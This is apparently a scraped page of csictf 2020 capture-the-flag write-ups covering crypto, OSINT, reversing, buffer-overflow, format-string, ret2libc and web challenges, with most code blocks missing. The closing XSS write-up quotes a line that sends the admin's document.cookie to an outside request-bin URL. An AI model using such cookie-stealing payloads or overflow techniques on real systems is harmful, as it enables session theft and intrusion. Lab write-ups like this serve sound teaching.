Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Very easy misc challenge.
Join the discord server
Run .flag
Bot says to dm and then deletes your message
Simply message the bot with .flag
and you get the flag from the bot.
Netcat into the given domain an port. Trying a bunch of different commands it appears that none of them do what you'd expect.
Running alias
shows that there are different aliases for commands which let you open files. Instead of trying to figure them all out I converted the flag.txt
file to base64 with base64 flag.txt
. Then it was a simple matter of copying the output and decoding it (I used cyberchef).
Googling M4 UKW
, we find out this is a type of enigma. M4 means there are 4 rotors; Gamma is the setting for the first rotor; the preceding 4 pairs of numbers are position and ring values respectively and the string of letters at the end are the plugboard values.
This leaves us with almost everything needed to decrypt the ciphertext. However, we are not given the values for rotors 2, 3 or 4; they can be in any position from I to VIII, so bruteforcing this we get the following:
Using this website, we get the flag:
Flag: csictf{no_shit_sherlock}
Rick has been captured by the council of ricks and in this dimension Morty has to save him, the chamber holding Rick needs a key . Can you help him find the key?
First, let's see what running the program does.
The pairs of numbers are the program, the singular numbers are me typing back to it.
There's nothing particularly clear here, so let's disassemble it in GHidra.
It looks very complicated, but we can ignore the bulk of it. What we need to focus on is the random number generation and what happens to it.
Two random numbers are generated. They are passed into function1
, then we +3
to the result and pass it through function2
. The result of that is then compared with the number we input. If they are not the same, the check
is set to 0.
At the end, if it's not 1 (and if takes under 30 seconds) the flag is read. So clearly we have to receive the numbers, work out what it does and then return the values (repeatedly) to get the flag.
Let's check what the two functions do.
We have a counter
that loops until it is greater than a number; if both numbers are divisible by the counter
the answer gets set to counter
- this is clearly some sort of highest common factor function.
This looks like a weird function, but if you write it in, say, python, it's much clearer what it does:
This is a factorial function.
Now we know what it does, the flow is simple:
And we can write a script that does this for us.
Flag: csictf{h3_7u2n3d_h1m531f_1n70_4_p1ck13}
csictf ran from 17/07/2020 to 21/07/2020.
These 3 guys encrypted my flag, but they didn't tell me how to decrypt it.
The source is as follows:
Rivest-Shamir-Adleman is the full name for RSA, a public-key cryptosystem widely used. You'll come across it many times in CTFs.
Now you can either try to break it manually, or use the great tool RsaCtfTool.
I decided to cheese it and use RsaCtfTool.
Simply inputting the values as so, we get our flag:
csictf{sh0uld'v3_t4k3n_b1gg3r_pr1m3s}
The original photographer of this picture commented the flag on his post. Find the flag.
Good old Ironstone found the picture in this tweet. The comments mention that Arunopal Banerjee is the actual photographer; visiting the instagram account we find the picture posted, and the flag is in the comments.
Flag: csictf{pl4g14r1sm_1s_b4d}
A reporter wanted to know where this flight is headed. Where does he (the reporter) live?
Google image search reveals a screenshot of a tweet by Jack Ma containing the image. If we go onto his profile and find the tweet. Using Ctrl-F through the replies, we find this comment of a reporter asking where the flight is headed, mentioning they're from San Francisco.
Flag: csictf{san_francisco}
Hoshimaseok is up to no good. Track him down.
A quick google of the user hoshimaseok
leads us to a GitHub page, found here.
We see two repositories, one called SomethingFishy
. Fishy it looks indeed.
A quick glance inside this repo reveals nothing. However considering the title, Commitment, maybe there is a commit somewhere with the flag.
We can see that there are two branches - master
and dev
. Upon clicking compare
, we see that there have indeed been many changes to this repo.
Scrolling through these, you will find the flag in index.js
, which was deleted.
The contents of index.js are as follows:
Flag: csictf{sc4r3d_0f_c0mm1tm3nt}
I googled some of the keywords from the challenge brief
istanbul shanghi macau suits
In the results pictures of James Bond showed up, James Bond's most recent boss (known as M) is called Gareth Mallory.
Flag: csictf{gareth_mallory}
Again, smashing the keyboard doesn't work. Sadly. Let's check out the protections:
Again, smashing the keyboard doesn't work. Sadly. Let's check out the protections.
Same thing again, GHidra decompilation time.
Again, gets()
shows a clear buffer overflow vulnerability. Among other functions there is a flag()
function.
So, calling flag()
returns the flag. Unsurprisingly.
We'll be using the buffer overflow vulnerability to redirect code execution to the flag()
function. Some experimenting shows a padding of 40 bytes is needed to overwrite RIP.
Flag: csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}
Travelling through spacetime!
Sadly, we can't just smash the keyboard. Let's check what protections are enabled.
NX is enabled, so unfortunately no shellcode, but no other protections. Let's perhaps decompile it in GHidra.
So we have a 44-byte-long buffer storing our input, which is read by gets()
- a clear buffer overflow vulnerability. Interestingly, the program seems to also return the flag if the if condition is met. I've known GHidra to make mistakes with numbers, so I check the disassembly in radare2.
As we can see, the buffer our input is stored in is lower down the stack to the variable that is compared, so if we overflow the buffer we will overflow into the other variable. From the decompilation we know the buffer is 44 bytes long, so we need 44 bytes of padding before we reach the checked variable and write 0xcafebabe
.
Flag: csictf{c4n_y0u_re4lly_telep0rt?}
Greta Thunberg 1 Administration 0
This was a different type of binary exploitation challenge. First, check the protections.
Much like the others. Let's run it.
So our input is sent back to us, along with the notice that we cannot log in with input. As we control the print, let's check if there's a format string bug.
And indeed there is. Interestingly, there's no buffer overflow. Let's decompile it to see what's going on.
main
is very simple - takes in input (using a secure fgets()
, explaining why there was no BoF) and passes the input to the login()
function.
Input it printed back to us, as we saw, with printf
. This causes the format string. The interesting part is it checks the global admin
variable before printing the flag.
Clearly, we have to overwrite the admin
variable somehow. To do this, we're going to have to leverage the format string %n
specifier for an arbitrary write.
%n
takes a pointer to a signed int, where the number of characters written so far is stored. Because we can control certain aspects of the stack (as the buffer is on the stack) we can tell it where to write the data. As we can control the input, we can tell it how much. This gives us an arbitrary write. If we want to write 20 bytes somewhere, we input 20 characters and then call %n
. We can even use other fancy format string specifiers to shorten it enough,
I would explain how to leverage this in detail, but frankly, others have done so much, much better than me :)
There are plenty more resources online.
Luckily for us, pwntools
contains a feature to automate %n
exploitation.
You should understand how the exploit works before you use tools to do it for you.
The pwntools module is fmtstr_payload
, and takes in two values: the offset for the format string and a dictionary. The keys in the dictionary are the location to write to, and the values are the data to write there.
Flag: csictf{n0_5tr1ng5_@tt@ch3d}
Wanna enter the Secret Society? Well you have to find the secret code first!
Again, smash the keyboard.
Flag: csivit{Bu!!er_e3pl01ts_ar5_5asy}
My nephew is a fussy eater and is only willing to eat chocolate oreo. Any other flavour and he throws a tantrum.
Nice and simple web challenge.
Looking at the cookie of the webpage it appears to base64 encoded.
Encode the word "chocolate" into base64 then replace the current base64 in the cookie. The only thing to note is make sure that the base64 is also url encoded.
"People who get violent get that way because they can’t communicate."
Navigating to /robots.txt
, we see:
Navigating to /fade/to/black
, we get the flag.
Flag: csictf{br0b0t_1s_pr3tty_c00l_1_th1nk}
My first C program that says hello, do you want to try it?
Smash was a very cool challenge where you were given the libc
version used by the binary. You had to bypass ASLR and then execute a ret2libc attack.
As per usual, run a quick checksec
Luckily for us, PIE is disabled and there is no canary. That makes our job much easier. Let's run it and see what happens.
Hmm, our input is printed back to us again. Is there another format string bug?
Indeed there is! Is a BoF possible this time?
Awesome.
There's nothing particularly interesting in the decompilation - main
takes input and calls say_hello
, which prints back to you.
No interesting strings either. As we are given the libc
, everything points to a good old ret2libc attack.
As we only had one input, the logical approach would be to use a ret2plt to leak the address of puts in libc
from the global offset table and call main again to let us have another input.
Flag: csictf{5up32_m4210_5m45h_8202}
I recovered a binary from my teacher's computer. I tried to reverse it but I couldn't.
Running file blaise
gives us this output:
Important thing here is it isn't stripped, that it is dynamically linked, and it's 64-bit, which will make the rev easier.
When we first run the file, we are given a two digit number, like so:
And we are promted for input. Inputting letters seems to end it, however typing a number keeps it running, and we can enter more:
Let's throw it into ghidra to see the pseudo-c code of the file. I've prepared the decompilation by renaming functions and variable already. Here's what our main function looks like:
However there isn't much useful info here, although we know that it calls the functions display_number
and process
Let's decompile display_number
:
We see here that it basically:
generates a random number between 15 and 20 (0xf and 0x14)
prints it
returns it
Let's decompile process
now:
This is most important function, and a lot is going on here:
Firstly, we basically create a for loop using counter and the random number as the end
Then we read the input with scanf
Then with counter, and random number, we call another function called c
, and output is stored in output
. We'll come back to this in a bit
Then it compares this output with our input, and if they aren't equal it sets flagcheck
to false
Increments counter, and starts loop again
Finally, at the end, it checks if flagcheck
is true
, if it is, it gives us the flag
So, in order to do this challenge, we need to write a script that constantly gives a number to the program, that equals the output of c
, then reads the flag
c
Let's decompile c
:
So it makes 3 variables, using the f
function, and then returns a value based on those 3.
Lets' decompile f
:
Just does some maths with the provided number.
To convert our two numbers (random and counter) to what is needed of the program, we'll port these functions to python, like so:
Using these, and pwntools, we can write our final script, like so:
Flag: csictf{y0u_d1sc0v3r3d_th3_p4sc4l's_tr14ngl3}
Looking at the source you can see that a request is made to http://chall.csivit.com:30256/view
by the admin to view your colour. You can then specify a URL and a colour for the admin to use.
I set up a request bin at https://ennfyqj04serj.x.pipedream.net
so that I easily could monitor requests made to that URL. But setting the URL that the admin visits to anything outside of http://chall.csivit.com:30256/view
seemed to throw an error. However I can set the colour to anything I like.
Looking at the source of http://chall.csivit.com:30256/
it is clear that the only form of sanitising is that "<" or ">" are replaced with "". This means that later on I could use ">>" in the place of ">" and "<<" in the place of "<".
The final exploit looked like the following:
Everything before and including the first semi-colon is used to escape the tags/quotes which the url is in.
The admin cookie is then sent to https://ennfyqj04serj.x.pipedream.net/?c="+document.cookie
and the cookie is your flag.